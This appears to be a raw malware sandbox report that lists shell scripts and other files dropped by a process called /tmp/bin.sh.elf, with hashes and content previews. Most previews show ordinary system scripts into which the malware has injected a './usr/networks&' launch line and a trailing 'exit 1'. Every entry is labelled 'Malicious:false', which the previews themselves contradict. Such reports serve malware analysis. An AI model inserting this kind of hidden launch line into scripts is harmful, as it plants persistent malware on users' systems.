                                                                  SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):893
                                                                  Entropy (8bit):4.754860515157645
                                                                  Encrypted:false
                                                                  SSDEEP:12:20a8PvpwsNE8rKpVXExGG3S69V43usL7XEwoARsVXniVXtgf4VXEt7Fs05fjgn:nlwsWAZDV4eg4w4c6Xjg
                                                                  MD5:8B937F22608AE7DB9A71801A5EAF7985
                                                                  SHA1:A968811F781A1FA33F18E4F9D23D66E805C926FE
                                                                  SHA-256:6D8F85A7D902E1B248753FCA7CC85C39228CC50A872436BB4CEF9276F36D97C9
                                                                  SHA-512:07AC35203AF776710809196B92DCF3CF9357C1689B627F7C9146E0B3EFD0B6B47FEF4FE0036AF1C6CABA5854E88AEB576B666C6C8B2E6AD998A143BD5C10E292
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# behaviour on exit, which resets default colors again...# print grid of all colors and brightnesses.python demo01.py..# Simple demo of changing foreground, background and brightness..python demo02.py..# Demonstrate the different behavior when autoreset is True and False..python demo03.py..# check that stripped ANSI in redirected stderr does not affect stdout.rm -f demo04.out.python demo04.py 2> demo04.out.cat demo04.out.rm -f demo04.out..# Demonstrate the difference between colorama initialized with wrapping on and off..python demo05.py..# Demonstrate printing colored, random characters at random positions on the screen.python demo06.py..# Demonstrate cursor relative movement: UP, DOWN, FORWARD, and BACK in colorama.CURSOR.python demo07.py..# Demonstrate the use of a context manager instead of manually using init and deinit.python demo08.py../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):824
                                                                  Entropy (8bit):4.411576521686501
                                                                  Encrypted:false
                                                                  SSDEEP:12:VFfxfNiNBxMZhLs/jMeZ0aMLlhLyljfBeZ0fjIClAMZhLecdj6RujrZy1Tn:ZNmGLsvZ7kLyqZSIxGLf6oZU
                                                                  MD5:CDDCC0755668278EDB780BD4EF65C45E
                                                                  SHA1:E66315D7E1B40196A94DB2127F021CB697ADA242
                                                                  SHA-256:9FC0A0139AE67EEC0EBB42A89C440F1B7E181E54F21B3D2B965E83B91A4E1C6E
                                                                  SHA-512:46090B4B7D308552BB28324E6963AF21F769677483336135831E5CC405EF58267440951018BBBFC773EB6302BC9DCEA27620399DB25E3FE1510BC1232B131CC3
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.test -f $DAEMON || exit 0..set -e..case "$1" in. start). echo -n "Starting $DESC: ". $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. stop). echo -n "Stopping $DESC: ". start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid. # \ --exec $DAEMON. echo "$NAME.". ;;. restart|force-reload). echo -n "Restarting $DESC: ". start-stop-daemon --stop --quiet --pidfile \. /var/run/$NAME.pid. # --exec $DAEMON. sleep 1. $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. *). N=/etc/init.d/$NAME. echo "Usage: $N {start|stop|restart|force-reload}" >&2. exit 1. ;;.esac..exit 0.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2239
                                                                  Entropy (8bit):4.714198727897739
                                                                  Encrypted:false
                                                                  SSDEEP:48:iBs/sdCu3uQzixZ9sIJyLjs/VhNO4HO0HszTKrBLeVXcR/d4Z+syfIZfwiQEw9r1:iBsEsFuIuGyK9eVX+uZ+syfIZfwiQEwr
                                                                  MD5:ADE364831C18F9ABBF6C3B6F050F7759
                                                                  SHA1:E1DC95E5FB2431D03A47FAE4C2B2B54B8945CD6E
                                                                  SHA-256:2F2441308AA69227E7193D1F3C91BF0B61AB27B1D553C810462FBF35490A5194
                                                                  SHA-512:359FA168A4BF7C20436DAFAC5C9C438327B6C994C75CC4C488EA0FFE440F71F6776CDDEAE801D86E3783214EC32E348D5C1994B006E0265608055FCDA423EDBA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. h|-help) usage ; exit 0 ;;. s|-second) kk=${key2} ;;. vvv) verbose="-vvv" ;;. vv) verbose="-vv" ;;. v|-verbose) verbose="-v" ;;. *) echo "Unknown option: -$opt " ; exit 1 ;;. esac. shift. opt="$1".done..if [ $# -lt 1 ]. then. usage. exit 1.fi..echo ">>> try to report capabilities:".sg_persist -c ${verbose} "$1".res=$?.case "$res" in. 0) ;;. 1) echo " syntax error" ;;. 2) echo " not ready" ;;. 3) echo " medium error" ;;. 5) echo " illegal request, report capabilities not supported?" ;;. 6) echo " unit attention" ;;. 9) echo " illegal request, Persistent Reserve (In) not supported" ;;. 11) echo " aborted command" ;;. 15) echo " file error with $1 " ;;. 20) echo " no sense" ;;. 21) echo " recovered error" ;;. 33) echo " timeout" ;;. 97) echo " response fails sanity" ;;. 98) echo " other SCSI error" ;;. 99) echo " other error" ;;. *) echo " unknown exit status for sg_persist: $res" ;
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):837
                                                                  Entropy (8bit):5.302563134496065
                                                                  Encrypted:false
                                                                  SSDEEP:12:cnghJ15N5jKJQlw6vWcWwH8QoFIr8zAZjF/6wQ8+WepqKUZ0N5JrHYV5N5jKUVcv:MK5NworhH83Igsv/6j59I0Nv05NwHeX4
                                                                  MD5:6F4CEFE8C604AF13A0E95B1A624268E0
                                                                  SHA1:95D3589209627FA8249BA32D78B11DC6E9E0B94E
                                                                  SHA-256:D30D1E9E6DD28C9CCC349B9781744F88B1A023052B98C10CC44427DC13A01157
                                                                  SHA-512:BA36E3FB93776A05AAE8CD731DC90D05CC04F4A1F76A141CEAE46EDBEDA4A02B8A20088CBF395985447C870ACC7CF2A6066A1C55D6A6B339AD7381B4973177A6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi.else..exit 1.fi...USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`..# Clears the logs if size is greater than specified limit.while [ $USAGE -gt $MAXSIZE ]; do...# changing the user specified LOGFILE_DAYS days to 1 days lesser...LOGFILE_DAYS=`expr $LOGFILE_DAYS "-" 1`...# If same day logs are reaching Max size, deleting all log files...if [ $LOGFILE_DAYS -eq 0 ]; then...find $LOG_DIR -type f -name hp-\* -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null...break..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi..USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`.done../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5640
                                                                  Entropy (8bit):5.075171234163134
                                                                  Encrypted:false
                                                                  SSDEEP:96:EndUdULCUP+WucEeLvUmp3qFvUnxEX3ZmXQfVStPDVYt4cI0pNZQ89LKVSTzCKwN:OUdULCUPSeLvUDNUxGZgQfVSDVTM79W7
                                                                  MD5:E91743F1831D7CE024336A919713390C
                                                                  SHA1:0A53FF0AFE70ADA2538643A69DD332CEF8B9CDA7
                                                                  SHA-256:72F50ACEC6CFB58D01899D4A8F64573DDF80B3A57DAF4EE9CE4B403873DF887E
                                                                  SHA-512:4C8CCAC875528A73D8113202A887EB009B258DB4A80233073ABC9F46AB21ECAB2937B3EA3FEB794ED2229BF3273E95D9B73073EB8990DDDC8AC9C8DCE161CF0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# because function is not supposed to exit error codes..fs_type () {..local fstype=""..if (export PATH="/lib/udev:$PATH"; type vol_id) >/dev/null 2>&1; then...PATH="/lib/udev:$PATH" \....fstype=$(vol_id --type "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type lsblk >/dev/null 2>&1 ; then...fstype=$(lsblk --nodeps --noheading --output FSTYPE -- "$1" || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type blkid >/dev/null 2>&1; then...fstype=$(blkid -o value -s TYPE "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..echo "NOT-DETECTED".}..is_dos_extended_partition() {..if type blkid >/dev/null 2>&1; then...local output....output="$(blkid -o export $1)"....# old blkid (util-linux << 2.24) errors out on extended p....if [ "$?" = "2" ]; then....return 0...fi....# dos partition type and no filesystem type?......if echo $output | grep -q ' PTTYPE=dos ' &&.....! echo $output | grep -q ' TYPE=';
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):407
                                                                  Entropy (8bit):4.430546624952678
                                                                  Encrypted:false
                                                                  SSDEEP:12:axuI47jZ9yPM/o47jZ9yPaLaAl5IYkWbWCGcxQuuiC/5s8n:CuI4fZV/o4fZjWqPC2Qu8/e8
                                                                  MD5:B133FEA1865145C4491358207DE1C0DB
                                                                  SHA1:30DC19C478A0D59E9C03DFB99D59AA67B4E706C3
                                                                  SHA-256:01BB6F1F7C079F3702E616E15548F3EF4BDF7D8594F6E4873964476159BD54FB
                                                                  SHA-512:138AF43BDB49654CEAB6498CAF1D747E4698CCCC135F095E093FEADA7031DB119EAF820E4661DB2B0104E2863F3A36C5D9EB5464E73E287CFCC61BD8603CE79E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit. fi. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -. else. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@". fi.else. # Output is not a terminal, cat arguments or stdin. if test $# = 0; then. if test -t 0; then. echo "Missing filename" 1>&2. exit. fi. cat. else. cat "$@". fi.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):179
                                                                  Entropy (8bit):4.813555283479331
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVay6vUZ6aAcvZ6sF5b2FpJRJUGE7zsjZ2FPYRKYUGE7zQvvvLQVOORgn:w6vUFAcvgfvRxgA4QRxgUv3LPn
                                                                  MD5:693F623F27A2CF8623A4ACEECD20DA9F
                                                                  SHA1:7A52B6AA1A47433B259D4699D86A6840C5E02D78
                                                                  SHA-256:EC43854908E92A14857A8845EB89F8C64DBFC7856BC23AA1F82BD2A75097EB2C
                                                                  SHA-512:01E779F1F569BBEED68AC5EE6C99FD558F003C3166B5F5FA0ED29F512D45AF03378F0708E359009DF3567E4EE003ED7DB395C854EF045F8A51901788A996F290
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..grep major-152 $f >/dev/null.if [ $? = 1 ]; then..echo alias block-major-152 aoe >> $f..echo alias char-major-152 aoe >> $f.fi.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):315
                                                                  Entropy (8bit):4.844907937025013
                                                                  Encrypted:false
                                                                  SSDEEP:6:wSWl0ARIP9cDhussXcAJWAbM+tCACzYsavu/C5VKSChR5bm026qyAJpl8LAhn:wvVuXFmYs1/LSChqmqfJs0hn
                                                                  MD5:43C4BF1017D72A45F95FB685FCECCF9A
                                                                  SHA1:B78469C2F587A3E6A4BB591385D5D721B8B829C0
                                                                  SHA-256:9A041A6D5102D1416B1616B4C13791F3ED00DE305DDE32E5E2233A85E5ACCD45
                                                                  SHA-512:A7D1050FDBF4BA02AD9DDE5E09895C89469439DBD0FE8B9639B1A91802AF96D03ED5D202BAF8354D49D4B9C4489E3B60616A76CEEE8C4924FB8C428C554526FC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..for d in `ls -d $sysd/block/etherd* 2>/dev/null | grep -v p` end; do..# maybe ls comes up empty, so we use "end"..test $d = end && continue...dev=`echo "$d" | sed 's/.*!//'`..printf "$format" \..."$dev" \..."`cat \"$d/netif\"`" \..."`cat \"$d/state\"`".done | sort../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):427
                                                                  Entropy (8bit):4.897324371958306
                                                                  Encrypted:false
                                                                  SSDEEP:12:chnJjBFcVAFBzKJ+NT7+J+900EV/+/gLl60k6XxVjpInPn:CdB6qFBGYNP+JO00e/MilNVFInP
                                                                  MD5:9E74B9DB16052AAFD66DC8BE8F3A69F4
                                                                  SHA1:A18ADC7A4062900F79D8DBE4430F53E17D0D4B42
                                                                  SHA-256:E4ECBF6B5F68F1DB22C13E934EE409855502080D2089DA534A39E9C73E76139B
                                                                  SHA-512:3FD605D3E7879DAAC636A01B8373A179796FF60070BCF9975844FC40217A4399B74DA8F345F3F28189CC82C5FFF26715A7D23DDECC0A42E1E794EE3A279B12E6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....exit 1...fi..fi.fi..# find the directory where udev rules are stored, often.# /etc/udev/rules.d.#.rules_d="`sed -n '/^udev_rules=/{ s!udev_rules=!!; s!\"!!g; p; }' $conf`".if test -z "$rules_d" ; then..rules_d=/etc/udev/rules.d.fi.if test ! -d "$rules_d"; then..echo "$me Error: cannot find udev rules directory" 1>&2..exit 1.fi.sh -xc "cp `dirname $0`/udev.txt $rules_d/60-aoe.rules"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1306
                                                                  Entropy (8bit):5.232118753528843
                                                                  Encrypted:false
                                                                  SSDEEP:24:koS8g1YJonwE2BxUCLzJ8ZpvPIfTw1aTTPh4V8TahlByh22pTflrykrs4:koS89E2HvZSIrAa3PhUkahXyh2KTlryG
                                                                  MD5:64D41D32A14275C6B34741EE3DFA5EAB
                                                                  SHA1:A441D2F4E709ED46E045A7A51701F4F2B9FB0C36
                                                                  SHA-256:0FB6B7E294DACF7EEF1583A074C8DF2889BD4366062564740E5A985C837C0754
                                                                  SHA-512:B60817E1DFEEF2DA2FBC23656C6C21188B0B5EE1CDE2B46D6DB4FC2A6416298048571A433024A892875F59A91EA175111A0A0D2716C308B35625E4E60FA6A20D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.ls $P > /dev/null 2>&1 || exit 1..# Initialize two files, one for /dev/3270 commands and one.# to replace the /etc/inittab file (old one saved in OLDinittab).echo "#!/bin/sh" > $SCR || exit 1.echo " " >> $SCR.echo "# Script built by /sbin/config3270" >> $SCR.if [ ! -d /dev/dasd ]; then..echo rm -rf "$D/$SUBD/*" >> $SCR.fi.echo "grep -v $TTY $INITTAB > $NINITTAB" > $SCRTMP || exit 1.echo "echo $ADDNOTE >> $NINITTAB" >> $SCRTMP.if [ ! -d /dev/dasd ]; then..echo mkdir -p $D/$SUBD >> $SCR.fi..# Now query the tub3270 driver for 3270 device information.# and add appropriate mknod and mingetty lines to our files.echo what=config > $P.while read devno maj min;do..if [ $min = 0 ]; then...fsmaj=$maj...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB c $fsmaj 0 >> $SCR....echo chmod 666 $D/$TUB >> $SCR...fi..elif [ $maj = CONSOLE ]; then...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB$devno c $fsmaj $min >> $SCR...fi..else...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TTY$d
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):19777
                                                                  Entropy (8bit):5.576952905096142
                                                                  Encrypted:false
                                                                  SSDEEP:384:fwMxiQBla8sAxIEVcwZ+ZoBaOOatUdpVnismIm4FOtcra5rdr/QB5oAl6MQBX6hy:fwMxra8HxIEkmImIOtcra5rAoAl636hy
                                                                  MD5:3CF3EA10A24E6A5799372E52C625F5FF
                                                                  SHA1:8DCE2DD4D30FE29A3CD9B06E8C276CFAEB41B191
                                                                  SHA-256:FD1FB0A9D12E75013B3C330D081C6817E5C0090DE03C22A96B14674A168B307F
                                                                  SHA-512:D0108C351A191121A5DB5777A451261837126CC955FFADCF0855C82F27CCF794B91FED77DE152AD61907595A30E879EA582E9819CCAEAC0BDCCAF82C07CC59CE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.fi.# ============= MultiSound.d/setdigital.c ==============.if test ! -d 'MultiSound.d'; then. $echo 'x -' 'creating directory' 'MultiSound.d'. mkdir 'MultiSound.d'.fi.if test -f 'MultiSound.d/setdigital.c' && test "$first_param" != -c; then. $echo 'x -' SKIPPING 'MultiSound.d/setdigital.c' '(file already exists)'.else. $echo 'x -' extracting 'MultiSound.d/setdigital.c' '(text)'. sed 's/^X//' << 'SHAR_EOF' > 'MultiSound.d/setdigital.c' &&./*********************************************************************.X *.X * setdigital.c - sets the DIGITAL1 input for a mixer.X *.X * Copyright (C) 1998 Andrew Veliath.X *.X * This program is free software; you can redistribute it and/or modify.X * it under the terms of the GNU General Public License as published by.X * the Free Software Foundation; either version 2 of the License, or.X * (at your option) any later version..X *.X * This program is distributed in the hope that it will be useful,.X * but WITHOUT ANY WAR
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1019
                                                                  Entropy (8bit):5.264867233271885
                                                                  Encrypted:false
                                                                  SSDEEP:24:NcdhLFmJJsA1Mz9mOBM1t1IjQ+51MC1JOgULmjXUkSo0:NYs51gXe1i95JJB8mH0
                                                                  MD5:946D056056885AB81686DFF084F8C0AC
                                                                  SHA1:6087B2C2445E11CDE4F03C2E71A445978D68C166
                                                                  SHA-256:CF5DEAF653121D3BAE355DBBF73837ABDB5AD46871BCE09376D1EAE23DBAC41A
                                                                  SHA-512:D91BE0DF8EB1A761C0BA21D6D563C90D1AB7A740CDCB1A71D611D3C8F6C48D4D6C6291E77B407E51AE9D8D264726806E82CDE5FF00068E0A0487598656365489
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..[ "$val" ] || { echo "can't find $1 in $VMLINUX" 1>&2; exit 1; }..# convert from hex to decimal..echo $((0x$val)).}..__data_loc=$(sym_val __data_loc)._edata_loc=$(sym_val _edata_loc).base_offset=$(sym_val _xiprom)..# convert to file based offsets.data_start=$(($__data_loc - $base_offset)).data_end=$(($_edata_loc - $base_offset))..# Make sure data occupies the last part of the file..file_end=$(${CONFIG_SHELL} "${srctree}/scripts/file-size.sh" "$XIPIMAGE").if [ "$file_end" != "$data_end" ]; then..printf "end of xipImage doesn't match with _edata_loc (%#x vs %#x)\n" \.. $(($file_end + $base_offset)) $_edata_loc 1>&2..exit 1;.fi..# be ready to clean up.trap 'rm -f "$XIPIMAGE.tmp"; exit 1' 1 2 3..# substitute the data section by a compressed version.$DD if="$XIPIMAGE" count=$data_start iflag=count_bytes of="$XIPIMAGE.tmp".$DD if="$XIPIMAGE" skip=$data_start iflag=skip_bytes |.$KGZIP -9 >> "$XIPIMAGE.tmp"..# replace kernel binary.mv -f "$XIPIMAGE.tmp" "$XIPIMAGE"../us
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):810
                                                                  Entropy (8bit):5.14795580060536
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBkcCZsL49ysL7FwuIGCjDCLn:M4+XKyrZRCZsL4QsL7FwuIzvCL
                                                                  MD5:DD8FCA0CC462A93575815302D5C70995
                                                                  SHA1:FFE07B0595BA0DAA3799B71E79F3648D02B641D3
                                                                  SHA-256:FC1B0AA6D39705668CA297DACF643A6D429E42A84DABDE0601734F864DBE364F
                                                                  SHA-512:D28E0773CFD7FA867E627785D1D86A8AC74A92FB5CB6CC47E642B1E41EB0DCB015D4186D87962A63BF51E22B2EF7FE237C1BCA9B04D557E2C48755D6EF319658
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1..if [ -x /sbin/loadmap ]; then. /sbin/loadmap.else. echo "You have to install it yourself".fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
